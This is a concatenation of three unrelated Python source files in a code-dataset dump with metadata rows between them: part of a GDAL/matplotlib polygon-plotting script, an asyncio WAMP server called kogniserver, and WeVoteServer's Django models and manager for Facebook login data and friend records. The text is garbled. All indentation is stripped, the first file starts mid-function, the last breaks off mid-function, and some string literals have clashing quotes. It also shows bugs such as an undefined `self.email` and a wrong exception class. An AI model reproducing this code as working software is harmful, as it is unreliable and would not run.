"""Orders coordinates."""
total = 0
x1, y1 = coords[0]
for x, y in coords[1:]:
total += (x - x1) * (y + y1)
x1, y1 = x, y
x, y = coords[0]
total += (x - x1) * (y + y1)
is_clockwise = total > 0
if clockwise != is_clockwise:
coords.reverse()
return coords
def make_codes(n):
"""Makes a list of path codes."""
codes = [Path.LINETO] * n
codes[0] = Path.MOVETO
return codes
def plot_polygon_patch(poly, color):
"""Plots a polygon as a patch."""
# Outer clockwise path.
coords = poly.GetGeometryRef(0).GetPoints()
coords = order_coords(coords, True)
codes = make_codes(len(coords))
for i in range(1, poly.GetGeometryCount()):
# Inner counter-clockwise paths.
coords2 = poly.GetGeometryRef(i).GetPoints()
coords2 = order_coords(coords2, False)
codes2 = make_codes(len(coords2))
# Concatenate the paths.
coords = np.concatenate((coords, coords2))
codes = np.concatenate((codes, codes2))
# Add the patch to the plot
path = Path(coords, codes)
patch = patches.PathPatch(path, facecolor=color)
plt.axes().add_patch(patch)
# Loop through all of the features in the countries layer and create
# patches for the polygons.
ds = ogr.Open(r'D:\osgeopy-data\global\ne_110m_admin_0_countries.shp')
lyr = ds.GetLayer(0)
for row in lyr:
geom = row.geometry()
if geom.GetGeometryType() == ogr.wkbPolygon:
plot_polygon_patch(geom, 'yellow')
elif geom.GetGeometryType() == ogr.wkbMultiPolygon:
for i in range(geom.GetGeometryCount()):
plot_polygon_patch(geom.GetGeometryRef(i), 'yellow')
plt.axis('equal')
plt.show()
| mit | 7,704,621,990,206,990,000 | 29.777778 | 70 | 0.643115 | false |
aleneum/kogniserver | src/kogniserver/async.py | 1 | 2307 | import logging
import os
from threading import Thread
import time
try:
import asyncio
except ImportError:
# Trollius >= 0.3 was renamed
import trollius as asyncio
from autobahn.asyncio.wamp import ApplicationSession
from services import SessionHandler
class Ping(Thread):
def __init__(self, wamp):
Thread.__init__(self)
self.running = True
self.wamp = wamp
def run(self):
try:
while self.running:
logging.debug("ping")
self.wamp.publish(u'com.wamp.ping', "ping")
time.sleep(1)
except Exception as e:
logging.debug(e)
raise e
class Component(ApplicationSession):
@staticmethod
def on_ping(event):
logging.debug(event)
@asyncio.coroutine
def onJoin(self, details):
if os.environ.get('DEBUG') in ['1','True','true','TRUE']:
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig()
logging.getLogger().setLevel(log_level)
self.session = SessionHandler(self, log_level)
# register RPC
reg = yield self.register(self.session.register_scope, u'service.displayserver.register')
rpc = yield self.register(self.session.call_rpc, u'service.displayserver.call')
# setup ping
sub = yield self.subscribe(self.on_ping, u'com.wamp.ping')
self.ping = Ping(self)
self.ping.start()
print 'kogniserver(asyncio) started...'
def onLeave(self, details):
self.ping.running = False
while self.ping.isAlive():
time.sleep(0.1)
self.session.quit()
print "kogniserver session left..."
def main_entry(ssl_cert=None):
from autobahn.asyncio.wamp import ApplicationRunner
proto = "wss" if ssl_cert else "ws"
options = None
if ssl_cert:
raise RuntimeError("asyncio backend does not support ssl")
runner = ApplicationRunner(url=u"{0}://127.0.0.1:8181/ws".format(proto),
realm=u"realm1", ssl=options)
try:
runner.run(Component)
except KeyboardInterrupt or Exception:
raise KeyboardInterrupt
print "shutting down kogniserver..."
if __name__ == '__main__':
main_entry()
| mit | 8,312,911,809,580,319,000 | 26.141176 | 97 | 0.61075 | false |
jainanisha90/WeVoteServer | import_export_facebook/models.py | 1 | 55791 | # import_export_facebook/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.core.validators import RegexValidator
from django.db import models
from email_outbound.models import SEND_STATUS_CHOICES, TO_BE_PROCESSED
from wevote_functions.functions import generate_random_string, positive_value_exists, convert_to_int
from exception.models import handle_exception, print_to_log
import wevote_functions.admin
import facebook
logger = wevote_functions.admin.get_logger(__name__)
FRIEND_INVITATION_FACEBOOK_TEMPLATE = 'FRIEND_INVITATION_FACEBOOK_TEMPLATE'
GENERIC_EMAIL_FACEBOOK_TEMPLATE = 'GENERIC_EMAIL_FACEBOOK_TEMPLATE'
KIND_OF_FACEBOOK_TEMPLATE_CHOICES = (
(GENERIC_EMAIL_FACEBOOK_TEMPLATE, 'Generic Email'),
(FRIEND_INVITATION_FACEBOOK_TEMPLATE, 'Invite Friend'),
)
class FacebookAuthResponse(models.Model):
"""
This is the authResponse data from a Facebook authentication
"""
voter_device_id = models.CharField(
verbose_name="voter_device_id initiating Facebook Auth", max_length=255, null=False, blank=False, unique=True)
datetime_of_authorization = models.DateTimeField(verbose_name='date and time of action', null=False, auto_now=True)
# Comes from Facebook authResponse FACEBOOK_LOGGED_IN
facebook_access_token = models.CharField(
verbose_name="accessToken from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_expires_in = models.IntegerField(verbose_name="expiresIn from Facebook", null=True, blank=True)
facebook_signed_request = models.TextField(verbose_name="signedRequest from Facebook", null=True, blank=True)
facebook_user_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
# Comes from FACEBOOK_RECEIVED_DATA
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
facebook_first_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_middle_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_last_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_profile_image_url_https = models.URLField(
verbose_name='url of voter's image from facebook', blank=True, null=True)
facebook_background_image_url_https = models.URLField(
verbose_name='url of voter's background 'cover' image from facebook \
(like the twitter banner photo)', blank=True, null=True)
facebook_background_image_offset_x = models.IntegerField(verbose_name="x offset of facebook cover image", default=0,
null=True, blank=True)
facebook_background_image_offset_y = models.IntegerField(verbose_name="y offset of facebook cover image", default=0,
null=True, blank=True)
def get_full_name(self):
full_name = self.facebook_first_name if positive_value_exists(self.facebook_first_name) else ''
full_name += " " if positive_value_exists(self.facebook_first_name) \
and positive_value_exists(self.facebook_last_name) else ''
full_name += self.facebook_last_name if positive_value_exists(self.facebook_last_name) else ''
if not positive_value_exists(full_name) and positive_value_exists(self.facebook_email):
full_name = self.email.split("@", 1)[0]
return full_name
class FacebookLinkToVoter(models.Model):
"""
This is the link between a Facebook account and a We Vote voter account
"""
voter_we_vote_id = models.CharField(verbose_name="we vote id for the email owner", max_length=255, unique=True)
facebook_user_id = models.BigIntegerField(verbose_name="facebook big integer id", null=False, unique=True)
secret_key = models.CharField(
verbose_name="secret key to verify ownership facebook account", max_length=255, null=False, unique=True)
date_last_changed = models.DateTimeField(verbose_name='date last changed', null=False, auto_now=True)
class FacebookMessageOutboundDescription(models.Model):
"""
A description of the Facebook direct message we want to send.
"""
alphanumeric = RegexValidator(r'^[0-9a-zA-Z]*$', message='Only alphanumeric characters are allowed.')
kind_of_send_template = models.CharField(max_length=50, choices=KIND_OF_FACEBOOK_TEMPLATE_CHOICES,
default=GENERIC_EMAIL_FACEBOOK_TEMPLATE)
sender_voter_we_vote_id = models.CharField(
verbose_name="we vote id for the sender", max_length=255, null=True, blank=True, unique=False)
recipient_voter_we_vote_id = models.CharField(
verbose_name="we vote id for the recipient if we have it", max_length=255, null=True, blank=True, unique=False)
recipient_facebook_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
recipient_facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
recipient_fb_username = models.CharField(unique=True, max_length=50, validators=[alphanumeric], null=True)
send_status = models.CharField(max_length=50, choices=SEND_STATUS_CHOICES, default=TO_BE_PROCESSED)
class FacebookUser(models.Model):
"""
My facebook friends details, from the perspective of facebook id of me
"""
facebook_user_id = models.BigIntegerField(verbose_name="facebook id of user", null=False, unique=False)
facebook_user_name = models.CharField(
verbose_name="User name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_first_name = models.CharField(
verbose_name="User's first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_middle_name = models.CharField(
verbose_name="User's middle_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
facebook_user_location_id = models.BigIntegerField(
verbose_name="location id of Facebook user", null=True, unique=False)
facebook_user_location_name = models.CharField(
verbose_name="User's location name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_gender = models.CharField(
verbose_name="User's gender from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_birthday = models.CharField(
verbose_name="User's birthday from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_last_name = models.CharField(
verbose_name="User's last_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_profile_image_url_https = models.URLField(verbose_name='url of voter image from facebook',
blank=True, null=True)
facebook_background_image_url_https = models.URLField(verbose_name='url of cover image from facebook',
blank=True, null=True)
facebook_background_image_offset_x = models.IntegerField(verbose_name="x offset of facebook cover image", default=0,
null=True, blank=True)
facebook_background_image_offset_y = models.IntegerField(verbose_name="y offset of facebook cover image", default=0,
null=True, blank=True)
we_vote_hosted_profile_image_url_large = models.URLField(verbose_name='we vote hosted large image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_medium = models.URLField(verbose_name='we vote hosted medium image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_tiny = models.URLField(verbose_name='we vote hosted tiny image url',
blank=True, null=True)
facebook_user_about = models.CharField(
verbose_name="User's About from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_is_verified = models.BooleanField(
verbose_name="User is verfired from Facebook", default=False)
facebook_user_friend_total_count = models.BigIntegerField(
verbose_name="total count of friends from facebook", null=True, unique=False)
class FacebookFriendsUsingWeVote(models.Model):
"""
My facebook friends ids who are already using Wvote App, from the perspective of facebook id of me
"""
facebook_id_of_me = models.BigIntegerField(verbose_name="facebook id of viewer", null=False, unique=False)
facebook_id_of_my_friend = models.BigIntegerField(verbose_name="facebook id of my friend", null=False, unique=False)
class FacebookManager(models.Model):
def __unicode__(self):
return "FacebookManager"
def create_facebook_link_to_voter(self, facebook_user_id, voter_we_vote_id):
create_new_facebook_link = True
facebook_link_to_voter = None
facebook_link_to_voter_saved = False
status = ""
success = True
if not positive_value_exists(facebook_user_id) or not positive_value_exists(voter_we_vote_id):
status += "CREATE_FACEBOOK_LINK_MISSING_REQUIRED_VARIABLES "
print_to_log(logger=logger, exception_message_optional=status)
success = False
results = {
'success': success,
'status': status,
'facebook_link_to_voter_saved': facebook_link_to_voter_saved,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
# Does a link already exist?
try:
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
facebook_user_id=facebook_user_id,
)
success = True
status += "FACEBOOK_LINK_TO_VOTER_ALREADY_EXISTS "
if voter_we_vote_id == facebook_link_to_voter.voter_we_vote_id:
facebook_link_to_voter_saved = True
create_new_facebook_link = False
success = True
else:
# Write over existing voter_we_vote_id
create_new_facebook_link = False
try:
facebook_link_to_voter.voter_we_vote_id = voter_we_vote_id
facebook_link_to_voter.save()
success = True
except Exception as e:
status += "FACEBOOK_LINK_TO_VOTER-UPDATE_VOTER_WE_VOTE_ID_FAILED (" + str(voter_we_vote_id) + ") "
handle_exception(e, logger=logger, exception_message=status)
success = False
except FacebookAuthResponse.DoesNotExist:
status += "EXISTING_FACEBOOK_LINK_TO_VOTER_DOES_NOT_EXIST "
except Exception as e:
status += "FACEBOOK_LINK_TO_VOTER-GET_FAILED "
handle_exception(e, logger=logger, exception_message=status)
# Any attempts to save a facebook_link using either facebook_user_id or voter_we_vote_id that already
# exist in the table will fail, since those fields are required to be unique.
if create_new_facebook_link:
facebook_secret_key = generate_random_string(12)
try:
facebook_link_to_voter = FacebookLinkToVoter.objects.create(
facebook_user_id=facebook_user_id,
voter_we_vote_id=voter_we_vote_id,
secret_key=facebook_secret_key,
)
facebook_link_to_voter_saved = True
success = True
status += "FACEBOOK_LINK_TO_VOTER_CREATED "
except Exception as e:
facebook_link_to_voter_saved = False
facebook_link_to_voter = FacebookLinkToVoter()
success = False
status += "FACEBOOK_LINK_TO_VOTER_NOT_CREATED "
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_link_to_voter_saved': facebook_link_to_voter_saved,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
def update_or_create_facebook_auth_response(
self, voter_device_id, facebook_access_token, facebook_user_id, facebook_expires_in,
facebook_signed_request,
facebook_email, facebook_first_name, facebook_middle_name, facebook_last_name,
facebook_profile_image_url_https, facebook_background_image_url_https,
facebook_background_image_offset_x, facebook_background_image_offset_y):
"""
:param voter_device_id:
:param facebook_access_token:
:param facebook_user_id:
:param facebook_expires_in:
:param facebook_signed_request:
:param facebook_email:
:param facebook_first_name:
:param facebook_middle_name:
:param facebook_last_name:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:return:
"""
defaults = {
"voter_device_id": voter_device_id,
}
if positive_value_exists(facebook_access_token):
defaults["facebook_access_token"] = facebook_access_token
if positive_value_exists(facebook_user_id):
defaults["facebook_user_id"] = facebook_user_id
if positive_value_exists(facebook_expires_in):
defaults["facebook_expires_in"] = facebook_expires_in
if positive_value_exists(facebook_signed_request):
defaults["facebook_signed_request"] = facebook_signed_request
if positive_value_exists(facebook_email):
defaults["facebook_email"] = facebook_email
if positive_value_exists(facebook_first_name):
defaults["facebook_first_name"] = facebook_first_name
if positive_value_exists(facebook_middle_name):
defaults["facebook_middle_name"] = facebook_middle_name
if positive_value_exists(facebook_last_name):
defaults["facebook_last_name"] = facebook_last_name
if positive_value_exists(facebook_profile_image_url_https):
defaults["facebook_profile_image_url_https"] = facebook_profile_image_url_https
if positive_value_exists(facebook_background_image_url_https):
defaults["facebook_background_image_url_https"] = facebook_background_image_url_https
# A zero value for the offsets can be a valid value. If we received an image, we also received the offsets.
try:
defaults["facebook_background_image_offset_x"] = int(facebook_background_image_offset_x)
except Exception:
defaults["facebook_background_image_offset_x"] = 0
try:
defaults["facebook_background_image_offset_y"] = int(facebook_background_image_offset_y)
except Exception:
defaults["facebook_background_image_offset_y"] = 0
try:
facebook_auth_response, created = FacebookAuthResponse.objects.update_or_create(
voter_device_id__iexact=voter_device_id,
defaults=defaults,
)
facebook_auth_response_saved = True
success = True
status = "FACEBOOK_AUTH_RESPONSE_UPDATED_OR_CREATED"
except Exception as e:
facebook_auth_response_saved = False
facebook_auth_response = FacebookAuthResponse()
success = False
created = False
status = "FACEBOOK_AUTH_RESPONSE_NOT_UPDATED_OR_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_saved': facebook_auth_response_saved,
'facebook_auth_response_created': created,
'facebook_auth_response': facebook_auth_response,
}
return results
def create_or_update_facebook_friends_using_we_vote(self, facebook_id_of_me, facebook_id_of_my_friend):
"""
We use this subroutine to create or update FacebookFriendsUsingWeVote table with my friends facebook id.
:param facebook_id_of_me:
:param facebook_id_of_my_friend:
:return:
"""
try:
facebook_friends_using_we_vote, created = FacebookFriendsUsingWeVote.objects.update_or_create(
facebook_id_of_me=facebook_id_of_me,
facebook_id_of_my_friend=facebook_id_of_my_friend,
defaults={
'facebook_id_of_me': facebook_id_of_me,
'facebook_id_of_my_friend': facebook_id_of_my_friend
}
)
facebook_friends_using_we_vote_saved = True
success = True
status = "FACEBOOK_FRIENDS_USING_WE_VOTE_CREATED"
except Exception as e:
facebook_friends_using_we_vote_saved = False
facebook_friends_using_we_vote = FacebookFriendsUsingWeVote()
success = False
status = "FACEBOOK_FRIENDS_USING_WE_VOTE_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_saved': facebook_friends_using_we_vote_saved,
'facebook_friends_using_we_vote': facebook_friends_using_we_vote,
}
return results
def create_or_update_facebook_user(self, facebook_user_id, facebook_user_first_name, facebook_user_middle_name,
facebook_user_last_name, facebook_user_name=None, facebook_user_location_id=None,
facebook_user_location_name=None, facebook_user_gender=None,
facebook_user_birthday=None, facebook_profile_image_url_https=None,
facebook_background_image_url_https=None, facebook_user_about=None,
facebook_user_is_verified=False, facebook_user_friend_total_count=None,
we_vote_hosted_profile_image_url_large=None,
we_vote_hosted_profile_image_url_medium=None,
we_vote_hosted_profile_image_url_tiny=None,
facebook_email=None):
"""
We use this subroutine to create or update FacebookUser table with my friends details.
:param facebook_user_id:
:param facebook_user_first_name:
:param facebook_user_middle_name:
:param facebook_user_last_name:
:param facebook_user_name:
:param facebook_user_location_id:
:param facebook_user_location_name:
:param facebook_user_gender:
:param facebook_user_birthday:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_user_about:
:param facebook_user_is_verified:
:param facebook_user_friend_total_count:
:param we_vote_hosted_profile_image_url_large:
:param we_vote_hosted_profile_image_url_medium:
:param we_vote_hosted_profile_image_url_tiny:
:param facebook_email:
:return:
"""
try:
# for facebook_user_entry in facebook_users:
facebook_user, created = FacebookUser.objects.update_or_create(
facebook_user_id=facebook_user_id,
defaults={
'facebook_user_id': facebook_user_id,
'facebook_user_name': facebook_user_name,
'facebook_user_first_name': facebook_user_first_name,
'facebook_user_middle_name': facebook_user_middle_name,
'facebook_user_last_name': facebook_user_last_name,
'facebook_email': facebook_email,
'facebook_user_location_id': facebook_user_location_id,
'facebook_user_location_name': facebook_user_location_name,
'facebook_user_gender': facebook_user_gender,
'facebook_user_birthday': facebook_user_birthday,
'facebook_profile_image_url_https': facebook_profile_image_url_https,
'facebook_background_image_url_https': facebook_background_image_url_https,
'facebook_user_about': facebook_user_about,
'facebook_user_is_verified': facebook_user_is_verified,
'facebook_user_friend_total_count': facebook_user_friend_total_count,
'we_vote_hosted_profile_image_url_large': we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': we_vote_hosted_profile_image_url_tiny
}
)
facebook_user_saved = True
success = True
status = " FACEBOOK_USER_CREATED"
except Exception as e:
facebook_user_saved = False
facebook_user = FacebookUser()
success = False
status = " FACEBOOK_USER_NOT_CREATED"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_saved': facebook_user_saved,
'facebook_user': facebook_user,
}
return results
def reset_facebook_user_image_details(self, facebook_user_id, facebook_profile_image_url_https,
facebook_background_image_url_https):
"""
Reset an facebook user entry with original image details from we vote image.
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:return:
"""
success = False
status = "ENTERING_RESET_FACEBOOK_USER_IMAGE_DETAILS"
values_changed = False
facebook_user_results = self.retrieve_facebook_user_by_facebook_user_id(facebook_user_id)
facebook_user = facebook_user_results['facebook_user']
if facebook_user_results['facebook_user_found']:
if positive_value_exists(facebook_profile_image_url_https):
facebook_user.facebook_profile_image_url_https = facebook_profile_image_url_https
values_changed = True
if positive_value_exists(facebook_background_image_url_https):
facebook_user.facebook_background_image_url_https = facebook_background_image_url_https
values_changed = True
facebook_user.we_vote_hosted_profile_image_url_large = ''
facebook_user.we_vote_hosted_profile_image_url_medium = ''
facebook_user.we_vote_hosted_profile_image_url_tiny = ''
if values_changed:
facebook_user.save()
success = True
status = "RESET_FACEBOOK_USER_IMAGE_DETAILS"
else:
success = True
status = "NO_CHANGES_RESET_TO_FACEBOOK_USER_IMAGE_DETAILS"
results = {
'success': success,
'status': status,
'facebook_user': facebook_user,
}
return results
def update_facebook_user_details(self, facebook_user,
cached_facebook_profile_image_url_https=False,
cached_facebook_background_image_url_https=False,
we_vote_hosted_profile_image_url_large=False,
we_vote_hosted_profile_image_url_medium=False,
we_vote_hosted_profile_image_url_tiny=False):
"""
Update an facebook user entry with cached image urls
:param facebook_user:
:param cached_facebook_profile_image_url_https:
:param cached_facebook_background_image_url_https:
:param we_vote_hosted_profile_image_url_large:
:param we_vote_hosted_profile_image_url_medium:
:param we_vote_hosted_profile_image_url_tiny:
:return:
"""
success = False
status = "ENTERING_UPDATE_FACEBOOK_USER_DETAILS"
values_changed = False
if facebook_user:
if positive_value_exists(cached_facebook_profile_image_url_https):
facebook_user.facebook_profile_image_url_https = cached_facebook_profile_image_url_https
values_changed = True
if positive_value_exists(cached_facebook_background_image_url_https):
facebook_user.facebook_background_image_url_https = cached_facebook_background_image_url_https
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_large):
facebook_user.we_vote_hosted_profile_image_url_large = we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_medium):
facebook_user.we_vote_hosted_profile_image_url_medium = we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(we_vote_hosted_profile_image_url_tiny):
facebook_user.we_vote_hosted_profile_image_url_tiny = we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
facebook_user.save()
success = True
status = "SAVED_FACEBOOK_USER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_FACBOOK_USER_DETAILS"
results = {
'success': success,
'status': status,
'facebook_user': facebook_user,
}
return results
def retrieve_facebook_auth_response(self, voter_device_id):
"""
:param voter_device_id:
:return:
"""
facebook_auth_response = FacebookAuthResponse()
facebook_auth_response_id = 0
try:
if positive_value_exists(voter_device_id):
facebook_auth_response = FacebookAuthResponse.objects.get(
voter_device_id__iexact=voter_device_id,
)
facebook_auth_response_id = facebook_auth_response.id
facebook_auth_response_found = True
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_FOUND_BY_VOTER_DEVICE_ID "
else:
facebook_auth_response_found = False
success = False
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_VARIABLES_MISSING "
except FacebookAuthResponse.DoesNotExist:
facebook_auth_response_found = False
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_NOT_FOUND "
except Exception as e:
facebook_auth_response_found = False
success = False
status = 'FAILED retrieve_facebook_auth_response '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_found': facebook_auth_response_found,
'facebook_auth_response_id': facebook_auth_response_id,
'facebook_auth_response': facebook_auth_response,
}
return results
def retrieve_facebook_auth_response_from_facebook_id(self, facebook_user_id):
"""
Retrieve facebook auth response from facebook user id
:param facebook_user_id:
:return:
"""
facebook_auth_response = FacebookAuthResponse()
facebook_auth_response_id = 0
try:
if positive_value_exists(facebook_user_id):
facebook_auth_response = FacebookAuthResponse.objects.get(
facebook_user_id=facebook_user_id,
)
facebook_auth_response_id = facebook_auth_response.id
facebook_auth_response_found = True
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_FOUND_BY_FACEBOOK_USER_ID "
else:
facebook_auth_response_found = False
success = False
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_VARIABLES_MISSING "
except FacebookAuthResponse.DoesNotExist:
facebook_auth_response_found = False
success = True
status = "RETRIEVE_FACEBOOK_AUTH_RESPONSE_NOT_FOUND "
except Exception as e:
facebook_auth_response_found = False
success = False
status = 'FAILED retrieve_facebook_auth_response'
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_auth_response_found': facebook_auth_response_found,
'facebook_auth_response_id': facebook_auth_response_id,
'facebook_auth_response': facebook_auth_response,
}
return results
def fetch_facebook_id_from_voter_we_vote_id(self, voter_we_vote_id):
facebook_user_id = 0
facebook_results = self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id)
if facebook_results['facebook_link_to_voter_found']:
facebook_link_to_voter = facebook_results['facebook_link_to_voter']
facebook_user_id = facebook_link_to_voter.facebook_user_id
return facebook_user_id
def retrieve_facebook_link_to_voter_from_facebook_id(self, facebook_user_id):
return self.retrieve_facebook_link_to_voter(facebook_user_id)
def retrieve_facebook_link_to_voter_from_voter_we_vote_id(self, voter_we_vote_id):
facebook_user_id = 0
facebook_secret_key = ""
return self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id, facebook_secret_key)
def retrieve_facebook_link_to_voter_from_facebook_secret_key(self, facebook_secret_key):
facebook_user_id = 0
voter_we_vote_id = ""
return self.retrieve_facebook_link_to_voter(facebook_user_id, voter_we_vote_id, facebook_secret_key)
def retrieve_facebook_link_to_voter(self, facebook_user_id=0, voter_we_vote_id='', facebook_secret_key=''):
"""
:param facebook_user_id:
:param voter_we_vote_id:
:param facebook_secret_key:
:return:
"""
facebook_link_to_voter = FacebookLinkToVoter()
facebook_link_to_voter_id = 0
try:
if positive_value_exists(facebook_user_id):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
facebook_user_id=facebook_user_id,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_FACEBOOK_USER_ID "
elif positive_value_exists(voter_we_vote_id):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
voter_we_vote_id__iexact=voter_we_vote_id,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_VOTER_WE_VOTE_ID "
elif positive_value_exists(facebook_secret_key):
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
secret_key=facebook_secret_key,
)
facebook_link_to_voter_id = facebook_link_to_voter.id
facebook_link_to_voter_found = True
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_FOUND_BY_FACEBOOK_SECRET_KEY "
else:
facebook_link_to_voter_found = False
success = False
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_VARIABLES_MISSING "
except FacebookLinkToVoter.DoesNotExist:
facebook_link_to_voter_found = False
success = True
status = "RETRIEVE_FACEBOOK_LINK_TO_VOTER_NOT_FOUND"
except Exception as e:
facebook_link_to_voter_found = False
success = False
status = 'FAILED retrieve_facebook_link_to_voter '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_link_to_voter_found': facebook_link_to_voter_found,
'facebook_link_to_voter_id': facebook_link_to_voter_id,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
def extract_facebook_details_data(self, facebook_friend_api_details_entry):
"""
Extracting facebook friend details with required fields
:param facebook_friend_api_details_entry:
:return:
"""
facebook_friend_dict = {}
facebook_friend_dict['facebook_user_id'] = (facebook_friend_api_details_entry.get('id')
if 'id' in facebook_friend_api_details_entry.keys() else None)
facebook_friend_dict['facebook_user_name'] = (facebook_friend_api_details_entry.get('name')
if 'name' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_first_name'] = (facebook_friend_api_details_entry.get('first_name')
if 'first_name' in facebook_friend_api_details_entry.keys()
else "")
facebook_friend_dict['facebook_user_middle_name'] = (facebook_friend_api_details_entry.get('middle_name')
if 'middle_name' in facebook_friend_api_details_entry.
keys() else "")
facebook_friend_dict['facebook_user_last_name'] = (facebook_friend_api_details_entry.get('last_name')
if 'last_name' in facebook_friend_api_details_entry.keys()
else "")
facebook_friend_dict['facebook_user_location_id'] = (facebook_friend_api_details_entry.get('location').get('id')
if 'location' in facebook_friend_api_details_entry.keys()
and facebook_friend_api_details_entry.
get('location', {}).get('id', {}) else None)
facebook_friend_dict['facebook_user_location_name'] = (facebook_friend_api_details_entry.get('location').get(
'name') if 'location' in facebook_friend_api_details_entry.keys() and facebook_friend_api_details_entry.get(
'location', {}).get('name', {}) else "")
facebook_friend_dict['facebook_user_gender'] = (facebook_friend_api_details_entry.get('gender')
if 'gender' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_birthday'] = (facebook_friend_api_details_entry.get('birthday')
if 'birthday' in facebook_friend_api_details_entry.keys()
else "")
# is_silhouette is true for default image of facebook
facebook_friend_dict['facebook_profile_image_url_https'] = \
(facebook_friend_api_details_entry.get(
'picture').get('data').get('url') if 'picture' in facebook_friend_api_details_entry.keys() and
facebook_friend_api_details_entry.get('picture', {}).get('data', {}).get('url', {}) and
not facebook_friend_api_details_entry.get('picture', {}).get('data', {}).get('is_silhouette', True)
else "")
facebook_friend_dict['facebook_background_image_url_https'] = \
(facebook_friend_api_details_entry.get('cover').get('source')
if 'cover' in facebook_friend_api_details_entry.keys() and
facebook_friend_api_details_entry.get('cover', {}).get('source', {}) else "")
facebook_friend_dict['facebook_user_about'] = (facebook_friend_api_details_entry.get('about')
if 'about' in facebook_friend_api_details_entry.keys() else "")
facebook_friend_dict['facebook_user_is_verified'] = (facebook_friend_api_details_entry.get('is_verified')
if 'is_verified' in facebook_friend_api_details_entry.
keys() else "")
return facebook_friend_dict
def retrieve_facebook_friends_from_facebook(self, voter_device_id):
"""
This function is for getting facebook friends who are already using WeVote
NOTE August 2017: The facebook "friends" API call when called from the server now only returns that subset of
your facebook friends who are already on WeVote, it will not show your friends who do not have the facebook
app on their facebook settings page. It is unclear if this code even works at all. The code that does the
job is in the WebApp using the "games" api "invitiable_friends" call.
If having problems see the note in client side WebApp FacebookInvitableFriends.jsx
Technical discussion: https://stackoverflow.com/questions/23417356
We use this routine to retrieve my facebook friends details and updating FacebookFriendsUsingWeVote table
:param voter_device_id:
:return: facebook_friends_list
"""
success = False
status = ''
facebook_friends_list_found = False
facebook_friends_list = []
facebook_api_fields = "id, name, first_name, middle_name, last_name, location{id, name}, gender, birthday, " \
"cover{source}, picture.width(200).height(200){url, is_silhouette}, about, is_verified "
auth_response_results = self.retrieve_facebook_auth_response(voter_device_id)
if not auth_response_results['facebook_auth_response_found']:
error_results = {
'status': "FACEBOOK_AUTH_RESPONSE_NOT_FOUND",
'success': success,
'facebook_friends_list_found': facebook_friends_list_found,
'facebook_friends_list': facebook_friends_list,
}
